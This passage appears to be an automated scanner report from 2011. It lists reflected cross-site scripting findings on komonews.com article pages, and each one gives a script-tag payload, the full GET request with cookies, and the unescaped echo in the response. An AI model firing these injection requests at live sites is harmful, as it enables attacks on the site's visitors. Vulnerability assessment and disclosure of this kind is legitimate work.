Pirates ma ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116734714.html?dd604"><script>alert(1)</script>91f36b20a5c=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.456. http://www.komonews.com/news/national/116736489.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116736489.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac900"><script>alert(1)</script>52506779f42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116736489.html?ac900"><script>alert(1)</script>52506779f42=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56584
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Report: Ex ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116736489.html?ac900"><script>alert(1)</script>52506779f42=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.457. http://www.komonews.com/news/national/116736624.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116736624.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49136"><script>alert(1)</script>43c868099eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116736624.html?49136"><script>alert(1)</script>43c868099eb=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55718
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
EPA to eas ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116736624.html?49136"><script>alert(1)</script>43c868099eb=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.458. http://www.komonews.com/news/national/116747399.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116747399.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddaa9"><script>alert(1)</script>a2d335a52c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116747399.html?ddaa9"><script>alert(1)</script>a2d335a52c2=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 60578
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.459. http://www.komonews.com/news/national/116750534.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116750534.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d14"><script>alert(1)</script>2c00cde6822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116750534.html?38d14"><script>alert(1)</script>2c00cde6822=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:12:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57241
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.460. http://www.komonews.com/news/national/116750784.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/national/116750784.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d549"><script>alert(1)</script>6657e3e05de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national/116750784.html?8d549"><script>alert(1)</script>6657e3e05de=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:01 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54354
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.461. http://www.komonews.com/news/offbeat/116565253.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116565253.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35879"><script>alert(1)</script>07658b738cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116565253.html?35879"><script>alert(1)</script>07658b738cd=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53461
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Stop or we ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116565253.html?35879"><script>alert(1)</script>07658b738cd=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.462. http://www.komonews.com/news/offbeat/116611588.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116611588.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f370e"><script>alert(1)</script>8e786bde4d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116611588.html?f370e"><script>alert(1)</script>8e786bde4d6=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Britain mu ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116611588.html?f370e"><script>alert(1)</script>8e786bde4d6=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.463. http://www.komonews.com/news/offbeat/116622758.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116622758.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d672"><script>alert(1)</script>4a6f14d0e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116622758.html?9d672"><script>alert(1)</script>4a6f14d0e5a=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r7-u31-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57019
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.464. http://www.komonews.com/news/offbeat/116623473.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116623473.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc44"><script>alert(1)</script>5d6eef18dfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116623473.html?acc44"><script>alert(1)</script>5d6eef18dfc=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53376
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.465. http://www.komonews.com/news/offbeat/116690659.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116690659.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa97f"><script>alert(1)</script>9a838f8e8f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116690659.html?aa97f"><script>alert(1)</script>9a838f8e8f3=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r7-u31-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53372
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.466. http://www.komonews.com/news/offbeat/116708664.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116708664.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1809"><script>alert(1)</script>2d2f9577483 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116708664.html?d1809"><script>alert(1)</script>2d2f9577483=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53541
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109db"><script>alert(1)</script>99deb6313cc was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116708664.html?ref=guiltypleasures109db"><script>alert(1)</script>99deb6313cc HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.468. http://www.komonews.com/news/offbeat/116708719.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116708719.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82447"><script>alert(1)</script>4ea4956d695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116708719.html?82447"><script>alert(1)</script>4ea4956d695=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53661
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Big cleani ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708719.html?82447"><script>alert(1)</script>4ea4956d695=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4ec"><script>alert(1)</script>245db4cf499 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116708719.html?ref=guiltypleasures2e4ec"><script>alert(1)</script>245db4cf499 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53679
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Big cleani ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708719.html?ref=guiltypleasures2e4ec"><script>alert(1)</script>245db4cf499" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.470. http://www.komonews.com/news/offbeat/116749349.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/offbeat/116749349.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d36b8"><script>alert(1)</script>3f9817aad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/offbeat/116749349.html?d36b8"><script>alert(1)</script>3f9817aad3=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53411
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Brazil fir ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116749349.html?d36b8"><script>alert(1)</script>3f9817aad3=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a7f6"><script>alert(1)</script>b8ce1649d07 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
